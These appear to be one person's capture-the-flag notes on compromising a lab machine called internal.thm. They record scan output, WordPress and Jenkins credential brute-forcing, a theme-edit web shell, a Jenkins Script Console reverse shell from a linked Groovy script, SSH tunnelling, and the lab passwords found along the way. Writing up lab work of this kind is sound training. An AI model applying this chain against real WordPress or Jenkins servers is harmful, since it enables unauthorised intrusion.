10.10.171.87

//creds

admin:my2boys Wordpress
william:arnold147
admin:spongebob
aubreanna:bubb13guM!@#123
root:tr0ub13guM!@#123


22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)

// no current exploits

// Brute Force attack with know username 
  // Unsuccessfull


80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

//Edit the host file as per our brief to internal.thm
//gobuster - run at internal.thm
	// further enum could be performed
	
/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
	http://internal.thm/blog/wp-login.php
		// possible BF creds
			//WPscan BF found creds
				Username: admin, Password: my2boys

	http://internal.thm/blog/wp-login.php?action=lostpassword
		//possible username enum
			//Creds are admin:my2boys
			//Admin login
				//found private post with creds
					Don’t forget to reset Will’s credentials william:arnold147
					//Shell edit theme 
					
	//Plugins found
			Akismet Anti-Spam Version 4.1.5 
			
			Hello Dolly Version 1.7.2 


	http://internal.thm/blog/index.php/2020/08/03/hello-world/
		// user comment
			//can also post on the site, a possilbe attack vector
		//Gravatar - research further
	//wpscan	
		

/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]

/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]

/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
mysqli_real_connect(): (HY000/1045): Access denied for user 'admin'@'localhost' (using password: YES)

/server-status        (Status: 403) [Size: 277]   


//nikto 

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.102.220
+ Target Hostname:    internal.thm
+ Target Port:        80
+ Start Time:         2021-11-21 00:32:16 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B^[[B+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5abef58e962a5, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /blog/wp-login.php: Wordpress login found
+ 7937 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2021-11-21 00:36:25 (GMT-5) (249 seconds)





//shell as WWW
	User on box aubreanna
	
// var/www/html/wordpress
	/** MySQL database username */
define( 'DB_USER', 'wordpress' );

/** MySQL database password */
define( 'DB_PASSWORD', 'wordpress123' 


//LinPEAS.sh

www-data@internal:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Aug  3  2020 .
drwxr-xr-x 24 root root 4096 Aug  3  2020 ..
drwx--x--x  4 root root 4096 Aug  3  2020 containerd
-rw-r--r--  1 root root  138 Aug  3  2020 wp-save.txt
www-data@internal:/opt$ cat wp-save.txt 
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:bubb13guM!@#123

// Shell as Aubreanna

	aubreanna@internal:~$ cat user.txt 
	
	aubreanna@internal:~$ cat jenkins.txt 
	Internal Jenkins service is running on 172.17.0.2:8080
	
	Tunnel the SSH connection 
// SSH tunnel
	ssh -L 8080:172.17.0.2:8080  aubreanna@10.10.92.209
	
		Browser 127.0.0.1:8080
			
			Jenkins service
// Jenkins
	Bruteforce login with Burp intruder
	Research Jenkins
		Login admin:spongebob
		
	Manage Jenking > Script Console>
	
	https://gist.githubusercontent.com/frohoff/fed1ffaab9b9beeb1c76/raw/7cfa97c7dc65e2275abfb378101a505bfb754a95/revsh.groovy
	
	change line in script 
		String cmd="bash";
		
// Shell as Jenkins
	jenkins@jenkins:/opt$ cat note.txt 
	Aubreanna,

	Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
	need access to the root user account.

	root:tr0ub13guM!@#123
	
//SSH as root
	root@internal:~# cat root.txt 



	

	
	


 
